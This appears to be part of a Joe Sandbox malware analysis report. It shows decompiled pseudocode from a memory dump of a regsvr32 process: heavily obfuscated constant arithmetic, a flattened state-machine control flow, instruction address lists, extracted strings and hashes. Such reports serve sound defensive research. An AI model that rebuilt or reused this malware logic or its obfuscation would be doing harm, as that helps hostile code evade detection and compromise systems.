				_v1780 = _v1780 >> 2;
				_v1780 = _v1780 >> 2;
				_v1780 = _v1780 ^ 0x000a2638;
				_v1680 = 0x58b587;
				_v1680 = _v1680 / _t499;
				_t500 = 0x6c;
				_v1680 = _v1680 / _t500;
				_v1680 = _v1680 ^ 0x000e92c3;
				_v1756 = 0xa3a224;
				_v1756 = _v1756 + 0xffffb0d0;
				_v1756 = _v1756 | 0x22aa770c;
				_v1756 = _v1756 ^ 0xa1e09b61;
				_v1756 = _v1756 ^ 0x83433f26;
				_v1772 = 0x502a69;
				_v1772 = _v1772 + 0xf56b;
				_v1772 = _v1772 ^ 0x45c826e2;
				_v1772 = _v1772 << 3;
				_v1772 = _v1772 ^ 0x2cc29674;
				_v1704 = 0x78c4c8;
				_v1704 = _v1704 >> 5;
				_v1704 = _v1704 >> 0xb;
				_v1704 = _v1704 ^ 0x000284d1;
				_v1636 = 0x5a1a48;
				_v1636 = _v1636 | 0x49fffb3e;
				_v1636 = _v1636 ^ 0x49fe8be8;
				_v1740 = 0xbf037f;
				_v1740 = _v1740 << 0xe;
				_t501 = 0x25;
				_v1740 = _v1740 / _t501;
				_v1740 = _v1740 | 0xccccb3e4;
				_v1740 = _v1740 ^ 0xcdfabced;
				_v1688 = 0x95b1ca;
				_v1688 = _v1688 ^ 0x177e4a6b;
				_v1688 = _v1688 | 0x2f1db7c3;
				_v1688 = _v1688 ^ 0x3ffaee54;
				_v1592 = 0x55c9d;
				_v1592 = _v1592 + 0x6a7d;
				_v1592 = _v1592 ^ 0x0009fe3c;
				_v1628 = 0x3a227c;
				_v1628 = _v1628 + 0x86b1;
				_v1628 = _v1628 ^ 0x003b89cb;
				_v1588 = 0x8f964;
				_v1588 = _v1588 ^ 0xa28705c5;
				_v1588 = _v1588 ^ 0xa2875abd;
				_v1748 = 0xfacc7e;
				_v1748 = _v1748 >> 7;
				_v1748 = _v1748 << 5;
				_v1748 = _v1748 * 0x52;
				_v1748 = _v1748 ^ 0x141cbb89;
				_v1668 = 0x1ea707;
				_v1668 = _v1668 >> 9;
				_v1668 = _v1668 ^ 0x0009aede;
				_v1620 = 0x6a93f9;
				_v1620 = _v1620 * 0x2f;
				_v1620 = _v1620 ^ 0x139d0c16;
				_v1732 = 0xe0254d;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 + 0x8d90;
				_v1732 = _v1732 ^ 0x6e303e8a;
				_v1732 = _v1732 ^ 0x6e36b510;
				_v1764 = 0x8f9e28;
				_v1764 = _v1764 | 0x05ab8c08;
				_v1764 = _v1764 ^ 0x1f734d6b;
				_v1764 = _v1764 | 0x4c44fbff;
				_v1764 = _v1764 ^ 0x5ed9dcbf;
				_v1664 = 0x89ae50;
				_v1664 = _v1664 + 0xffff7042;
				_v1664 = _v1664 ^ 0x008bcf93;
				_v1720 = 0x59414f;
				_v1720 = _v1720 ^ 0xb8de2fa2;
				_v1720 = _v1720 << 3;
				_v1720 = _v1720 ^ 0xc43925a0;
				_v1776 = 0x701ae5;
				_v1776 = _v1776 * 0x2f;
				_v1776 = _v1776 + 0xffff7ac3;
				_v1776 = _v1776 >> 0xd;
				_v1776 = _v1776 ^ 0x000eab5b;
				_v1784 = 0xc6ba99;
				_v1784 = _v1784 + 0xffff3dc8;
				_v1784 = _v1784 + 0xfffff02f;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0x17a755e4;
				_v1648 = 0x49cca0;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0x7324fd9e;
				_v1656 = 0xf258c2;
				_v1656 = _v1656 >> 9;
				_v1656 = _v1656 ^ 0x0001b893;
				_v1792 = 0x2c7b35;
				_t265 =  &_v1792; // 0x2c7b35
				_t502 = 0x5b;
				_v1792 =  *_t265 * 0xd;
				_v1792 = _v1792 << 2;
				_v1792 = _v1792 + 0x1495;
				_v1792 = _v1792 ^ 0x090f1a77;
				_v1768 = 0xbf4508;
				_v1768 = _v1768 / _t502;
				_v1768 = _v1768 * 0x7b;
				_v1768 = _v1768 * 0x6c;
				_v1768 = _v1768 ^ 0x6d142a82;
				_v1640 = 0xd70bb;
				_v1640 = _v1640 + 0xffffb965;
				_v1640 = _v1640 ^ 0x000d3816;
				_v1752 = 0x745b9d;
				_v1752 = _v1752 >> 0xb;
				_v1752 = _v1752 + 0xde80;
				_v1752 = _v1752 + 0xffff3192;
				_v1752 = _v1752 ^ 0x0008925b;
				_v1760 = 0xacf8cd;
				_v1760 = _v1760 + 0xffff9672;
				_v1760 = _v1760 | 0xf153a794;
				_v1760 = _v1760 >> 8;
				_v1760 = _v1760 ^ 0x00f89a8f;
				_v1736 = 0x809c29;
				_v1736 = _v1736 + 0xffffec2c;
				_v1736 = _v1736 | 0xf5f6afdc;
				_v1736 = _v1736 ^ 0xe29e6862;
				_v1736 = _v1736 ^ 0x176fe90e;
				_v1692 = 0x187f09;
				_v1692 = _v1692 ^ 0xea03092e;
				_v1692 = _v1692 + 0x8629;
				_v1692 = _v1692 ^ 0xea1b0891;
				_v1616 = 0xdadf05;
				_v1616 = _v1616 >> 3;
				_v1616 = _v1616 ^ 0x001b90e7;
				_v1700 = 0x255f4a;
				_v1700 = _v1700 + 0x19d8;
				_v1700 = _v1700 * 0x77;
				_v1700 = _v1700 ^ 0x1164c06a;
				_v1728 = 0x19a192;
				_v1728 = _v1728 | 0x5ed50fa2;
				_v1728 = _v1728 + 0xffff411c;
				_v1728 = _v1728 | 0x02c614be;
				_v1728 = _v1728 ^ 0x5edf5bbc;
				_v1608 = 0x401b2;
				_v1608 = _v1608 | 0xbe85eb48;
				_v1608 = _v1608 ^ 0xbe8cf33f;
				_v1676 = 0x1ae3ab;
				_v1676 = _v1676 | 0xf7e0dbb3;
				_v1676 = _v1676 >> 4;
				_v1676 = _v1676 ^ 0x0f7cac70;
				_v1724 = 0xfdfaa3;
				_v1724 = _v1724 + 0xbcd0;
				_v1724 = _v1724 | 0x4b62528b;
				_v1724 = _v1724 ^ 0x4bf9131d;
				_v1708 = 0x8383c7;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 + 0xffff26cd;
				_v1708 = _v1708 ^ 0x002bd4f5;
				_v1624 = 0xf208a5;
				_v1624 = _v1624 << 8;
				_v1624 = _v1624 ^ 0xf20fbad4;
				_t548 = _v1584;
				while(1) {
					L1:
					_t503 = 0x5394512;
					L2:
					while(_t550 != 0x36274) {
						if(_t550 == 0x34d5b0c) {
							_push(_t503);
							_t477 = E04B985FF(_v1736, _v1692, __eflags,  &_v1580, 0,  &_v1564, _v1616, 0, _v1700);
							__eflags = _t477;
							if(_t477 == 0) {
								L26:
								return _t477;
							}
							E04BA1538(_v1728, _v1608, _v1580);
							_t537 = _v1724;
							_push(_v1576);
							_t507 = _v1676;
							L25:
							return E04BA1538(_t507, _t537);
						}
						if(_t550 == 0x37ad1c9) {
							_t537 = _v1624;
							_push(_v1584);
							_t507 = _v1708;
							goto L25;
						}
						if(_t550 == _t503) {
							_push(_v1792);
							_t481 = E04B9017B( &_v1564, _v1776, _t503, _v1784, _v1648, _v1584,  &_v1580, _v1656);
							_t555 = _t555 + 0x20;
							__eflags = _t481;
							if(__eflags != 0) {
								E04BA1538(_v1768, _v1640, _v1580);
								E04BA1538(_v1752, _v1760, _v1576);
							}
							L14:
							_t550 = 0x37ad1c9;
							while(1) {
								L1:
								_t503 = 0x5394512;
								goto L2;
							}
						}
						if(_t550 == 0x854d193) {
							_t550 = 0x36274;
							continue;
						}
						if(_t550 == 0x9c7608b) {
							E04BA0DB1(_v1696,  &_v1044, __eflags, _v1684, _t503, _v1652);
							 *((short*)(E04B909DD(_v1644,  &_v1044, _v1596, _v1712))) = 0;
							E04B8BAA9(_v1672, _v1780, __eflags, _v1680, _v1756,  &_v524);
							_push(_v1740);
							_push(_v1636);
							_push(_v1704);
							E04BA2D0A(_v1592, __eflags,  &_v524, _v1628, _v1588, _v1748, 0x4b818bc,  &_v1564,  &_v1044, E04B9E1F8(0x4b818bc, _v1772, __eflags));
							E04B9FECB(_t488, _v1668, _v1620, _v1732, _v1764);
							_t555 = _t555 + 0x58;
							__eflags = E04B8BFBE( &_v1564, _t496, _v1720);
							if(__eflags != 0) {
								_t474 = 0x2f41e48;
								__eflags = _t548 - 0x2f41e48;
								_t503 = 0x5394512;
								_t550 =  ==  ? 0x5394512 : 0x34d5b0c;
								continue;
							}
							goto L14;
						}
						if(_t550 != 0xf62a168) {
							L20:
							__eflags = _t550 - 0x4f1a594;
							if(__eflags != 0) {
								continue;
							}
							return _t474;
						}
						if(_t548 != _t474) {
							_t550 = 0x9c7608b;
							continue;
						}
						_push(_v1788);
						_push( &_v1584);
						_t477 = E04B99774(_v1612, _v1660, _v1600, _t503, _v1604, _t503);
						_t555 = _t555 + 0x18;
						if(_t477 == 0) {
							goto L26;
						}
						_t550 = 0x9c7608b;
						goto L1;
					}
					_t472 = E04B9C387(_t503);
					__eflags = _t472 - E04B9BC6B();
					_t474 = 0x2f41e48;
					_t550 = 0xf62a168;
					_t548 =  !=  ? 0x2f41e48 : 0x95df4e1;
					_t503 = 0x5394512;
					goto L20;
				}
			}

0x04b82392
0x04b8239c
0x04b823a4
0x04b823a9
0x04b823b1
0x04b823b9
0x04b823c1
0x04b823c9
0x04b823ce
0x04b823dc
0x04b823e0
0x04b823e2
0x04b823ea
0x04b823ef
0x04b823fa
0x04b82402
0x04b8240d
0x04b82415
0x04b8241d
0x04b82422
0x04b8242a
0x04b82435
0x04b82440
0x04b8244b
0x04b82456
0x04b82461
0x04b8246c
0x04b82477
0x04b8247f
0x04b8248a
0x04b8249f
0x04b824a2
0x04b824a9
0x04b824b4
0x04b824bc
0x04b824c4
0x04b824cc
0x04b824d4
0x04b824df
0x04b824e7
0x04b824f2
0x04b824fd
0x04b82513
0x04b8251a
0x04b82525
0x04b82530
0x04b8253b
0x04b82546
0x04b82559
0x04b8255a
0x04b82561
0x04b8256c
0x04b82574
0x04b8257c
0x04b82584
0x04b8258c
0x04b82597
0x04b8259f
0x04b825aa
0x04b825b2
0x04b825ba
0x04b825bf
0x04b825c4
0x04b825cc
0x04b825e0
0x04b825f2
0x04b825f7
0x04b82600
0x04b8260b
0x04b82613
0x04b8261b
0x04b82623
0x04b8262b
0x04b82633
0x04b8263b
0x04b82643
0x04b8264b
0x04b82650
0x04b82658
0x04b82660
0x04b82665
0x04b8266a
0x04b82672
0x04b8267d
0x04b82688
0x04b82693
0x04b8269b
0x04b826a4
0x04b826a7
0x04b826ab
0x04b826b3
0x04b826bb
0x04b826c3
0x04b826cb
0x04b826d3
0x04b826db
0x04b826e6
0x04b826f1
0x04b826fc
0x04b82707
0x04b82712
0x04b8271d
0x04b82728
0x04b82733
0x04b8273e
0x04b82746
0x04b8274b
0x04b82755
0x04b82759
0x04b82761
0x04b8276c
0x04b82774
0x04b8277f
0x04b82792
0x04b82799
0x04b827a4
0x04b827ac
0x04b827b1
0x04b827b9
0x04b827c1
0x04b827c9
0x04b827d1
0x04b827d9
0x04b827e1
0x04b827e9
0x04b827f1
0x04b827fc
0x04b82807
0x04b82812
0x04b8281a
0x04b82822
0x04b82827
0x04b8282f
0x04b8283c
0x04b82840
0x04b82848
0x04b8284d
0x04b82857
0x04b8285f
0x04b82867
0x04b8286f
0x04b82874
0x04b8287c
0x04b82887
0x04b8288f
0x04b8289a
0x04b828a5
0x04b828ad
0x04b828b8
0x04b828c0
0x04b828c7
0x04b828c8
0x04b828cc
0x04b828d1
0x04b828d9
0x04b828e1
0x04b828ef
0x04b828f8
0x04b82901
0x04b82905
0x04b8290d
0x04b82918
0x04b82923
0x04b8292e
0x04b82936
0x04b8293b
0x04b82943
0x04b8294b
0x04b82953
0x04b8295b
0x04b82963
0x04b8296b
0x04b82970
0x04b82978
0x04b82980
0x04b82988
0x04b82990
0x04b82998
0x04b829a0
0x04b829a8
0x04b829b0
0x04b829b8
0x04b829c0
0x04b829cb
0x04b829d3
0x04b829de
0x04b829e6
0x04b829f3
0x04b829f7
0x04b829ff
0x04b82a07
0x04b82a0f
0x04b82a17
0x04b82a1f
0x04b82a27
0x04b82a32
0x04b82a3d
0x04b82a48
0x04b82a53
0x04b82a5e
0x04b82a66
0x04b82a71
0x04b82a79
0x04b82a81
0x04b82a89
0x04b82a91
0x04b82a99
0x04b82a9e
0x04b82aa6
0x04b82aae
0x04b82ab9
0x04b82ac6
0x04b82ad1
0x04b82ad8
0x04b82ad8
0x04b82add
0x00000000
0x04b82ae2
0x04b82af4
0x04b82d78
0x04b82da3
0x04b82dab
0x04b82dad
0x04b82de9
0x04b82de9
0x04b82de9
0x04b82dc1
0x04b82dc6
0x04b82dcb
0x04b82dd2
0x04b82dd9
0x00000000
0x04b82dde
0x04b82afc
0x04b82d64
0x04b82d6b
0x04b82d72
0x00000000
0x04b82d72
0x04b82b04
0x04b82cb3
0x04b82ce4
0x04b82ce9
0x04b82cec
0x04b82cee
0x04b82d02
0x04b82d17
0x04b82d1c
0x04b82c89
0x04b82c89
0x04b82ad8
0x04b82ad8
0x04b82add
0x00000000
0x04b82add
0x04b82ad8
0x04b82b10
0x04b82ca9
0x00000000
0x04b82ca9
0x04b82b1c
0x04b82b99
0x04b82bc1
0x04b82be2
0x04b82bef
0x04b82bf3
0x04b82bfa
0x04b82c46
0x04b82c63
0x04b82c68
0x04b82c85
0x04b82c87
0x04b82c90
0x04b82c9a
0x04b82c9c
0x04b82ca1
0x00000000
0x04b82ca1
0x00000000
0x04b82c87
0x04b82b24
0x04b82d56
0x04b82d56
0x04b82d5c
0x00000000
0x00000000
0x00000000
0x04b82d5c
0x04b82b2c
0x04b82b72
0x00000000
0x04b82b72
0x04b82b2e
0x04b82b39
0x04b82b58
0x04b82b5d
0x04b82b62
0x00000000
0x00000000
0x04b82b68
0x00000000
0x04b82b68
0x04b82d31
0x04b82d3d
0x04b82d44
0x04b82d49
0x04b82d4e
0x04b82d51
0x00000000
0x04b82d51

Strings

5{,, xrefs: 04B828C0
$P, xrefs: 04B823DA
}j, xrefs: 04B826E6
i*P, xrefs: 04B82633
J_%, xrefs: 04B829DE
|":, xrefs: 04B826FC
M%, xrefs: 04B827A4
8&, xrefs: 04B825C4
OAY, xrefs: 04B82812

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$5{,$8&$J_%$M%$OAY$i*P$|":$}j
API String ID: 0-2024644708
Opcode ID: 243a7372c476619dc9390e132efeb07a367f38856b58119d551fe70e9f83109f
Instruction ID: 323b39f48d39bf3088bd67fb310e2dfbc9cde395bd38dd7d94fbd53b72149679
Opcode Fuzzy Hash: 243a7372c476619dc9390e132efeb07a367f38856b58119d551fe70e9f83109f
Instruction Fuzzy Hash: 87322F714093819FD7B8DF61C58AB9BBBE1BBC4308F50891DE2DA96260D7B19909CF13

Uniqueness

Uniqueness Score: -1.00%

Function 04B9B257, Relevance: 11.7, Strings: 9, Instructions: 425
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E04B9B257(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr _t442;
				void* _t450;
				signed int _t452;
				intOrPtr _t464;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				intOrPtr _t476;
				void* _t511;
				intOrPtr* _t519;
				signed int _t522;
				signed int* _t528;
				void* _t531;

				_push(_a8);
				_push(_a4);
				_v16 = __ecx;
				_push(__edx);
				_push(__ecx);
				E04B9FE29(__ecx);
				_v104 = 0xdca0c2;
				_t528 =  &(( &_v196)[4]);
				_v104 = _v104 ^ 0x20eddded;
				_v104 = _v104 + 0xc1e4;
				_t464 = 0;
				_v104 = _v104 ^ 0x20323f12;
				_t526 = 0;
				_v100 = 0xb7a414;
				_t522 = 0x63dbfd2;
				_v100 = _v100 >> 0xd;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00000017;
				_v56 = 0x45a952;
				_t466 = 0x59;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 ^ 0x18c33027;
				_v188 = 0x2a9354;
				_v188 = _v188 * 0x52;
				_v188 = _v188 + 0xffff09d3;
				_v188 = _v188 ^ 0x657f446d;
				_v188 = _v188 ^ 0x68d207a2;
				_v156 = 0xab48ef;
				_v156 = _v156 >> 9;
				_v156 = _v156 ^ 0x16e9b314;
				_v156 = _v156 + 0xffff4dee;
				_v156 = _v156 ^ 0x16e86217;
				_v76 = 0xa04b9d;
				_v76 = _v76 / _t466;
				_v76 = _v76 + 0xffff95c9;
				_v76 = _v76 ^ 0x000bb2f5;
				_v96 = 0x5e9ce7;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 + 0x393b;
				_v96 = _v96 ^ 0x0008104f;
				_v168 = 0x9b8ea1;
				_v168 = _v168 >> 3;
				_v168 = _v168 ^ 0x41b76bd4;
				_t467 = 0x4a;
				_v168 = _v168 / _t467;
				_v168 = _v168 ^ 0x00e0763a;
				_v84 = 0x6b9fd8;
				_v84 = _v84 + 0xffff492d;
				_v84 = _v84 ^ 0xc4f61535;
				_v84 = _v84 ^ 0xc49355d0;
				_v92 = 0xe62d26;
				_v92 = _v92 + 0xffffd3ae;
				_v92 = _v92 + 0xba25;
				_v92 = _v92 ^ 0x00e8488b;
				_v176 = 0x224b80;
				_v176 = _v176 * 0x64;
				_v176 = _v176 + 0xbfa2;
				_v176 = _v176 ^ 0x4d1eb270;
				_v176 = _v176 ^ 0x4076c61f;
				_v24 = 0x19cf70;
				_v24 = _v24 ^ 0x9000781e;
				_v24 = _v24 ^ 0x90166967;
				_v88 = 0x46d2d8;
				_v88 = _v88 << 0xd;
				_v88 = _v88 + 0x562b;
				_v88 = _v88 ^ 0xda50dff0;
				_v112 = 0x785cae;
				_v112 = _v112 ^ 0x168a73c4;
				_v112 = _v112 | 0x1d89c9b4;
				_v112 = _v112 ^ 0x1ff91637;
				_v196 = 0xff4614;
				_t468 = 0x5f;
				_v196 = _v196 / _t468;
				_v196 = _v196 + 0x757b;
				_t469 = 0x16;
				_v196 = _v196 * 0x60;
				_v196 = _v196 ^ 0x012524f0;
				_v80 = 0xc3120d;
				_v80 = _v80 | 0x1e4982bc;
				_v80 = _v80 * 0x7e;
				_v80 = _v80 ^ 0x2837c3c2;
				_v120 = 0xd97d0d;
				_v120 = _v120 << 0xd;
				_v120 = _v120 + 0x504;
				_v120 = _v120 ^ 0x2fa67262;
				_v172 = 0x34730a;
				_t142 =  &_v172; // 0x34730a
				_v172 =  *_t142 * 0x22;
				_t144 =  &_v172; // 0x34730a
				_v172 =  *_t144 / _t469;
				_v172 = _v172 << 8;
				_v172 = _v172 ^ 0x5108b0e0;
				_v68 = 0x5410d;
				_v68 = _v68 | 0x0af8be45;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0xafd73693;
				_v40 = 0x3314ee;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x0cc221f8;
				_v148 = 0xdcf092;
				_v148 = _v148 >> 2;
				_t470 = 0x7d;
				_v148 = _v148 * 7;
				_v148 = _v148 ^ 0xc025e338;
				_v148 = _v148 ^ 0xc1a4d56b;
				_v48 = 0x99791e;
				_v48 = _v48 + 0xd07a;
				_v48 = _v48 ^ 0x009468bf;
				_v20 = 0xfa3426;
				_v20 = _v20 * 0x2f;
				_v20 = _v20 ^ 0x2dec6acf;
				_v128 = 0x599df;
				_v128 = _v128 / _t470;
				_v128 = _v128 ^ 0x7679aa05;
				_v128 = _v128 ^ 0x7675df44;
				_v124 = 0xbc7529;
				_t471 = 0x70;
				_v124 = _v124 / _t471;
				_v124 = _v124 * 5;
				_v124 = _v124 ^ 0x00024b90;
				_v140 = 0x23c06e;
				_v140 = _v140 << 8;
				_v140 = _v140 + 0xffff4990;
				_v140 = _v140 ^ 0x23b90b70;
				_v32 = 0x48411;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x000cf15b;
				_v28 = 0x8f257d;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 ^ 0x00045aca;
				_v72 = 0xc5b926;
				_t472 = 0x25;
				_v72 = _v72 * 0xd;
				_v72 = _v72 + 0x5de2;
				_v72 = _v72 ^ 0x0a0d42ec;
				_v52 = 0xb82feb;
				_v52 = _v52 / _t472;
				_v52 = _v52 ^ 0x000a7562;
				_v192 = 0x93d477;
				_v192 = _v192 + 0x2145;
				_v192 = _v192 >> 9;
				_t473 = 0x79;
				_v192 = _v192 / _t473;
				_v192 = _v192 ^ 0x000494fa;
				_v60 = 0xdd5e00;
				_v60 = _v60 + 0xe8be;
				_v60 = _v60 ^ 0x00d904e2;
				_v116 = 0xf92f20;
				_v116 = _v116 << 2;
				_v116 = _v116 + 0xffff4fca;
				_v116 = _v116 ^ 0x03e480d1;
				_v108 = 0xc8e556;
				_v108 = _v108 << 0xe;
				_v108 = _v108 | 0x9333dae4;
				_v108 = _v108 ^ 0xbb75d6e6;
				_v184 = 0xf22b18;
				_v184 = _v184 + 0xffff5aea;
				_v184 = _v184 ^ 0x0621037b;
				_v184 = _v184 + 0xffff0635;
				_v184 = _v184 ^ 0x06c19238;
				_v36 = 0xa8ef7f;
				_v36 = _v36 + 0xffff4107;
				_v36 = _v36 ^ 0x00ab8625;
				_v44 = 0xa6062e;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0xc0ced932;
				_v180 = 0x5e49fc;
				_v180 = _v180 + 0x375b;
				_v180 = _v180 << 2;
				_t474 = 0x74;
				_v180 = _v180 * 0x1c;
				_v180 = _v180 ^ 0x2957b537;
				_v164 = 0x531cb2;
				_v164 = _v164 << 0xf;
				_v164 = _v164 ^ 0x1fcb8a78;
				_v164 = _v164 / _t474;
				_v164 = _v164 ^ 0x014b6a45;
				_v64 = 0x492d9e;
				_v64 = _v64 ^ 0x2124760e;
				_v64 = _v64 ^ 0x216a5ba9;
				_v132 = 0x711783;
				_v132 = _v132 | 0x71acd4bd;
				_v132 = _v132 + 0x97cf;
				_v132 = _v132 ^ 0x71fa50e2;
				_v152 = 0xb0a3b1;
				_v152 = _v152 ^ 0xa6c9b18c;
				_t475 = 0x5e;
				_v152 = _v152 / _t475;
				_v152 = _v152 / _t475;
				_v152 = _v152 ^ 0x0003c09f;
				_v136 = 0xe5fa51;
				_v136 = _v136 + 0xde7e;
				_v136 = _v136 + 0xffffe7ef;
				_v136 = _v136 ^ 0x00ec445b;
				_t519 = _v12;
				while(1) {
					L1:
					_t442 = _v144;
					while(1) {
						L2:
						while(1) {
							L3:
							_t476 = _v160;
							while(1) {
								L4:
								_t531 = _t522 - 0x93283d2;
								if(_t531 > 0) {
									break;
								}
								if(_t531 == 0) {
									return E04BA2B09(_v132, _t464, _v152, _v136);
								}
								if(_t522 == 0x6c245) {
									_push( &_v12);
									_push(_t464);
									_push(_t476);
									_push(_v68);
									_push(_v172);
									_push(_v120);
									_push(_v80);
									_push(_t476);
									_push(_v196);
									_push(_t476);
									_push(_v112);
									_push(_v88);
									_push(_v16);
									_t450 = E04B8FA95( &_v8, _v24);
									_t528 = _t528 - 0xc + 0x40;
									if(_t450 == 0) {
										L25:
										_t522 = 0x635125b;
										while(1) {
											L1:
											_t442 = _v144;
											goto L2;
										}
									} else {
										_t452 = E04B8DC1B( &_v8);
										_t522 = 0x4f2b403;
										_t442 = _v12 * 0x2c + _t464;
										_v144 = _t442;
										_t519 =  >=  ? _t464 : (_t452 & 0x0000001f) * 0x2c + _t464;
										goto L2;
									}
									L34:
								} else {
									if(_t522 == 0x4f2b403) {
										_t476 = E04B8EE62(_v148, _v16, _v48, _v20, _v128, _v56,  *_t519);
										_t528 =  &(_t528[5]);
										_t442 = _v144;
										_v160 = _t476;
										_t511 = 0xe34a72e;
										_t522 =  !=  ? 0xe34a72e : 0xced26bb;
										continue;
									} else {
										if(_t522 == 0x635125b) {
											E04BA2B09(_v180, _t526, _v164, _v64);
											_t522 = 0x93283d2;
											while(1) {
												L1:
												_t442 = _v144;
												goto L2;
											}
										} else {
											if(_t522 == 0x63dbfd2) {
												_t522 = 0x8a8e175;
												continue;
											} else {
												if(_t522 != 0x8a8e175) {
													L30:
													if(_t522 != 0xfb7e38f) {
														_t442 = _v144;
														goto L3;
													}
												} else {
													_push(_t476);
													_push(_t476);
													_t442 = E04B8C5D8(0x20000);
													_t464 = _t442;
													_t528 =  &(_t528[3]);
													if(_t464 != 0) {
														_t522 = 0x965da6a;
														while(1) {
															L1:
															_t442 = _v144;
															L2:
															L3:
															_t476 = _v160;
															goto L4;
														}
													}
												}
											}
										}
									}
								}
								L33:
								return _t442;
								goto L34;
							}
							if(_t522 == 0x965da6a) {
								_push(_t476);
								_push(_t476);
								_t442 = E04B8C5D8(0x2000);
								_t526 = _t442;
								_t528 =  &(_t528[3]);
								if(_t442 == 0) {
									_t522 = 0x93283d2;
									goto L29;
								} else {
									_t522 = 0x6c245;
									goto L1;
								}
							} else {
								if(_t522 == 0xbf0ab43) {
									E04B8C3A7(_v100, _a8, _v108, _v184, _t526, _v36, _v44);
									_t528 =  &(_t528[5]);
									goto L25;
								} else {
									if(_t522 == 0xced26bb) {
										_t519 = _t519 + 0x2c;
										asm("sbb esi, esi");
										_t522 = (_t522 & 0xfebda1a8) + 0x635125b;
										goto L4;
									} else {
										if(_t522 == _t511) {
											E04B9FD4E(_v124, _v140, _v32, _v28,  &_v4, _v72, _t476, _v104, _t526);
											_t522 =  !=  ? 0xbf0ab43 : 0xced26bb;
											_t442 = E04B83046(_v52, _v192, _v60, _v160, _v116);
											_t528 =  &(_t528[0xb]);
											L29:
											_t511 = 0xe34a72e;
										}
										goto L30;
									}
								}
							}
							goto L33;
						}
					}
				}
			}

0x04b9b261
0x04b9b26a
0x04b9b271
0x04b9b278
0x04b9b279
0x04b9b27a
0x04b9b27f
0x04b9b287
0x04b9b28a
0x04b9b294
0x04b9b29c
0x04b9b29e
0x04b9b2a6
0x04b9b2a8
0x04b9b2b0
0x04b9b2b5
0x04b9b2ba
0x04b9b2bf
0x04b9b2c4
0x04b9b2d9
0x04b9b2dc
0x04b9b2e3
0x04b9b2ee
0x04b9b2fb
0x04b9b2ff
0x04b9b307
0x04b9b30f
0x04b9b317
0x04b9b31f
0x04b9b324
0x04b9b32c
0x04b9b334
0x04b9b33c
0x04b9b352
0x04b9b359
0x04b9b364
0x04b9b36f
0x04b9b377
0x04b9b37c
0x04b9b384
0x04b9b38c
0x04b9b394
0x04b9b399
0x04b9b3a5
0x04b9b3a8
0x04b9b3ac
0x04b9b3b4
0x04b9b3bf
0x04b9b3ca
0x04b9b3d5
0x04b9b3e0
0x04b9b3e8
0x04b9b3f0
0x04b9b3f8
0x04b9b400
0x04b9b40d
0x04b9b411
0x04b9b419
0x04b9b421
0x04b9b429
0x04b9b434
0x04b9b43f
0x04b9b44a
0x04b9b452
0x04b9b457
0x04b9b45f
0x04b9b469
0x04b9b471
0x04b9b479
0x04b9b481
0x04b9b489
0x04b9b497
0x04b9b49c
0x04b9b4a2
0x04b9b4af
0x04b9b4b2
0x04b9b4b6
0x04b9b4be
0x04b9b4c9
0x04b9b4dc
0x04b9b4e3
0x04b9b4ee
0x04b9b4f6
0x04b9b4fb
0x04b9b503
0x04b9b50b
0x04b9b513
0x04b9b518
0x04b9b51c
0x04b9b524
0x04b9b528
0x04b9b52d
0x04b9b535
0x04b9b540
0x04b9b54b
0x04b9b553
0x04b9b55e
0x04b9b569
0x04b9b571
0x04b9b57c
0x04b9b584
0x04b9b58e
0x04b9b591
0x04b9b595
0x04b9b59d
0x04b9b5a5
0x04b9b5b0
0x04b9b5bb
0x04b9b5c6
0x04b9b5d9
0x04b9b5e0
0x04b9b5eb
0x04b9b5fb
0x04b9b5ff
0x04b9b607
0x04b9b60f
0x04b9b61b
0x04b9b61e
0x04b9b627
0x04b9b62b
0x04b9b633
0x04b9b63b
0x04b9b640
0x04b9b648
0x04b9b650
0x04b9b65b
0x04b9b663
0x04b9b670
0x04b9b67b
0x04b9b683
0x04b9b68e
0x04b9b6a3
0x04b9b6a6
0x04b9b6ad
0x04b9b6b8
0x04b9b6c3
0x04b9b6d9
0x04b9b6e0
0x04b9b6eb
0x04b9b6f3
0x04b9b6fb
0x04b9b704
0x04b9b709
0x04b9b70f
0x04b9b717
0x04b9b722
0x04b9b72d
0x04b9b738
0x04b9b740
0x04b9b745
0x04b9b74d
0x04b9b755
0x04b9b75d
0x04b9b762
0x04b9b76a
0x04b9b772
0x04b9b77a
